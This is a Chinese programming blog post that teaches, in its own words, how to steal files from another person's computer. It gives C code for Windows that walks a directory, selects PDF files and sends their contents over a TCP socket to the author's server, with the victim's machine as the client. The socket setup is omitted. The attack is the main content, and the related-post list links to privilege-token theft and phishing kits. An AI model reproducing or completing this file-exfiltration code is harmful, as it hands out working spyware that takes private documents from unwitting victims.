文件窃取之文件遍历

最新推荐文章于 2024-04-29 23:26:31 发布
最新推荐文章于 2024-04-29 23:26:31 发布
阅读量286 收藏
点赞数
分类专栏: C++大一上学期之window编程 文章标签: 网络编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38290986/article/details/130788593
版权

我们来学习一下如何窃取别人电脑上的文件,原理就是遍历电脑上的文件,然后发送给服务器,别人的电脑充当客户端,我们自己的电脑充当服务器

第一步  包含头文件

#include <stdio.h>
#include <windows.h>

这里,如果再包含一个winsock2的头文件,就会报错,因为写了windows.h就不需要winsock2了

第二步  定义一个获取路径下所有文件名的函数

int main()  {
	getFile("C:\\Users\\笔记");   }

这里要用两个\\来表示一个\

第三步 定义getFile函数

int  getFile(const char* filepath)
{
	WIN32_FIND_DATA FindFileData;
	/文件、键盘、鼠标等都是通过句柄来标识
	HANDLE hListFile;

WIN32_FIND_DATA可用来表示文件,它是一个结构体,然后再定义一个句柄

第三步

    char szFilePath[MAX_PATH]{0};
	/strcpy字符串复制函数,strcat截断函数
	strcpy( szFilePath,filepath );
	strcat(szFilePath, "\\*");

MAX_PATH是系统的一个宏,表示260

第四步 将句柄赋值为

hListFile = FindFirstFile ( szFilePath, &FindFileData );

查看一下FindFirstFile的定义FindFirstFileW (

             _In_ LPCWSTR lpFileName,
            _Out_ LPWIN32_FIND_DATAW lpFindFileData

另外它的返回值为Handle,这就是为什么我们要定义一个句柄的原因

 第一个参数类型为wchar*,而我们的szFilePath为char* ,所以我们将字符集修改为多字符集

第五步 循环遍历

do {
		char mypath[MAX_PATH]{};
		strcpy(mypath, filepath);
		strcat(mypath, FindFileData.cFileName);
		if (strstr(mypath,".pdf"))
		{
			SendtoServ(mypath);
			printf("mypath==%s\n", mypath);
		}
	} while (FindNextFile(hListFile, &FindFileData));

strcat的第二个参数表示文件名,因为WIN32_FIND_DATA类型表示一个结构体,它里面有个成员变量表示文件名,FindNextFile函数,第一个参数为文件句柄,第二个参数为第一个文件的地址,知道它返回NULL,表示查不到下一个文件

这里有个错误一定要记住,路径一定要对,不管是形参还是实参,不然就会出现sendtosrv里面的fp为空指针,引起报错,我这里的错误就是传入的最后面少了两个\\,导致拼接错误

我们尝试编译后,发现如下错误

error C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.

error C4996: 'strcat': This function or variable may be unsafe. Consider using strcat_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.

我们可以直接禁用警告,右键属性-> C++=>所有选项->禁用特定警告,填入4996

if判断表示,如果文件名中含有pdf,调用函数发送给服务端,我们来实现一下sendtoserv函数

int  SendtoServ (const char* mypath)  {
...
    FILE* fp = fopen(mypath, "rb");
	int len = fread(sendBuff, 1, 100, fp);
	int iLen = send(sockClie, (char*)sendBuff, 100, 0);
...
}

这里省略的内容和TCP client内容差不多,也是建立一个socket连接,给服务端发送数据,不同的是这里发送的是mypath路径下的文件内容,将文件内容通过fread读取到sendbuff中,然后发送给服务端。这个len的作用应该就是让一个变量来接收一下返回值,而且len只出现了这一次

雪傲天1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《操作系统》总结四(文件管理)
Peter-H
10-04 1万+
文件管理 主要内容: 文件系统基础:包括文件概念、文件的逻辑结构(顺序文件,索引文件,索引顺序文件)、目录结构(文件控制块和索引结点,单级目录结构和两级目录结构,树形目录结构,图形目录结构)、文件共享和文件保护(访问类型,访问控制)。文件系统实现:包括文件系统层次结构、目录实现、文件实现。磁盘组织与管理:包括磁盘的结构、磁盘调度算法、磁盘的管理。 4.1 文件的概念和定义
SystemToken:窃取特权令牌以获取SYSTEM Shell
03-11
系统令牌此代码将遍历系统上的所有进程,直到达到具有以下特征的进程: 该过程的用户是SYSTEM 该过程的所有者是管理员一旦找到具有这两个特征的流程,便会复制该流程的令牌,并创建一个具有该令牌的新流程。...
224.网络文件截取之文件遍历
m0_68935893的博客
04-29 65
【代码】224.网络文件截取之文件遍历
第四章 文件管理
weixin_45360119的博客
01-04 1438
第四章 文件管理 4.1 文件管理 文件之间应该如何被组织起来(目录结构) 文件应如何存放在外存中(文件的物理结构) 操作系统如何管理外存中的空闲块(存储空间的管理) 操作系统需要提供的其他文件管理功能 文件共享:使多个用户可以共享使用一个文件 文件保护:如何保证不同的用户对文件有不同的操作权限 4.1.1 初识文件管理 文件的定义 文件:是以计算机硬盘为载体的存储在计算机上的信息集合,创建者所定义的一组相关信息的集合(记录式文件、流式文件文件一般由数据、标签(分类、索引)、访问权限组成。 在系统运行时
网络编程实战案例——窃取文件
八块吮指原味鸡的博客
09-17 396
通过“窃取文件”的比喻,实现一个简单的TCP通信的案例
Web 安全之文件下载漏洞详解
路多辛的所思所想
12-24 2078
在数字化时代,文件下载是网络应用程序的重要的功能之一,用户可以通过这一功能获取所需的数据和信息。但是这一看似简单的功能的实现一不小心就会产生安全风险,即文件下载漏洞。攻击者可以通过文件下载漏洞非法获取到服务器上的敏感文件或受保护的文件,导致数据泄露、系统被入侵、知识产权被窃取等一系列严重后果。本文将深入讲解文件下载漏洞的原理、类型、攻击方式、影响和防护措施。
基于OpenPGP的文件管理系统
毕业作品网站
07-23 833
设计一个本地文件处理协议,基于openPGP实现本地加密文件夹对目标文件实现对存储者和调阅者的基于pgp的真实性认证和文件加密;上述文件安全性不依赖于本地系统,即本地其他非授权用户(即便是系统管理员)无法以可理解的方式读出该文件夹中文件内容;对处理过程中可能涉及的临时存储至少实现可靠的敏感信息残留覆盖;选择Linux或MSwindows,实现该协议的一个C++实现实例。包括软件设计文档、源代码及注释、可执行安装包、自测用例和测试分析报告、第三方资源及其说明。...
文件上传漏洞
2301_80661529的博客
03-03 1218
文件上传漏洞是指在Web应用程序中,由于开发人员对用户上传文件的功能设计和实现不够严谨,导致攻击者能够上传恶意文件(如Webshell、木马等)到服务器,进而可能获取服务器的控制权或者进行其他非法操作的安全漏洞。文件类型检查不足:攻击者可通过修改文件扩展名或MIME类型,上传非预期类型的文件,如将PHP脚本伪装成图片文件文件内容验证缺失:即使上传文件的扩展名正确,服务器也应进一步检查文件内容,确认其实际格式与声称的格式相符。上传目录权限过高。
第4章 文件管理
心情第一
11-22 621
文件管理是操作系统的五大职能之一,主要涉及文件的逻辑组织和物理组织,目录的结构和管理。所谓文件管理,就是操作系统中实现文件统一管理的一组软件、被管理的文件以及为实施文件管理所需要的一些数据结构的总称(是操作系统中负责存取和管理文件信息的机构)从系统角度来看,文件系统是对文件存储器的存储空间进行组织,分配和回收,负责文件的存储,检索,共享和保护。从用户角度来看,文件系统主要是实现"按名取存",文件系统的用户只要知道所需文件文件名,就可存取文件中的信息,而无需知道这些文件究竟存放在什么地方。
恶意文件分类
swordheart的博客
08-23 3728
后门程序就是留在计算机系统中,供某位特殊使用者通过某种特殊方式控制计算机系统的途径。后门程序,跟我们通常所说的"木马"有联系也有区别。联系在于:都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制。区别在于:木马是一个完整的软件,而后门则体积较小且功能都很单一。后门程序类似于特洛依木马(简称"木马"),其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后门程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其它电脑。
基于QT开发的一款远程控制软件源码+项目说明+详细注释+exe执行程序.zip
10-07
客户端编写遍历目录和遍历文件夹函数,以及查找所有盘符。创建新线程,连接到服务器,接收和处理来自服务器的指令和数据等。以及添加处理文件的功能,获取文件、下载文件、上传文件、删除文件。发送文件到服务端和从...
cve-2021-27065:快速一线Powershell脚本来检测webshel​​l,可能的zip和日志
03-12
遍历每个文件夹并在其中查找文件。 然后,它命中的每个文件都将开始检查文件中的模式“ \ w *:// \ w / <\ w * \ s。 <。 >”。 每次匹配都会选择文件的路径和找到的文件中的行 选择之后,它将把它写到位于...
PhishingKitTracker:让我们跟踪网络钓鱼工具包,以提供给研究社区学习的原始资料!
03-10
该存储库保存了犯罪分子用来窃取用户信息的网络钓鱼工具包的集合。 几乎raw文件中的每个文件都是恶意文件,因此我强烈建议您不要打开这些文件,也不要滥用代码来恶作剧您的朋友。 使用这些工具包可能会导致不可逆转...
护网面试题总结+DD安全工程师笔试问题
09-15
知识点:常见的中间件漏洞包括 IIS PUT 漏洞、短文件名猜解、远程代码执行、解析漏洞 Apache 解析漏洞、目录遍历 Nginx 文件解析、目录遍历、CRLF 注入、目录穿越 Tomcat 远程代码执行、war 后门文件部署 JBoss 反序...
战略规划之五看三定方法论.pptx
06-14
战略规划之五看三定方法论.pptx
cutcamera1718339848103.png
06-14
cutcamera1718339848103.png
小游戏的java程序开发
06-14
小游戏的java程序开发
python 4个作业.zip
最新发布
06-14
Python学习笔记,复习巩固,作业!!!
shopxo download 任意文件读取漏洞
09-02
shopxo是一种流行的开源电商系统,以其简单易用和灵活性而备受欢迎。然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求,注入恶意代码来访问目标文件。攻击者可能可以通过执行一系列步骤来实现此目标,例如: 1. 识别目标系统上潜在的敏感文件,如数据库配置文件、用户身份验证文件等。 2. 构造特定的URL来请求这些文件,使用目标系统的下载功能。 3. 在URL中注入特殊字符或路径遍历符号,以绕过访问限制和读取目标文件。 一旦攻击者成功读取到目标文件,他们可能会进一步利用这些信息来实施其他攻击,例如窃取用户信息、篡改网站内容或者进行其他恶意活动。 为了防范shopxo download任意文件读取漏洞,网站管理员可以采取以下措施: 1. 及时更新shopxo系统以修复任何已知漏洞,并安装最新的补丁程序。 2. 限制对敏感文件的访问权限,确保只有授权的用户能够访问它们。 3. 验证和过滤用户输入,以防止任意文件读取漏洞的利用。 4. 实施Web应用程序防火墙(WAF),以监视和阻止恶意请求。 5. 定期进行安全审计和漏洞扫描,以及对服务器和应用程序配置进行安全性评估。 通过采取这些预防措施,可以最大限度地减少shopxo download任意文件读取漏洞的风险,并确保网站和用户数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值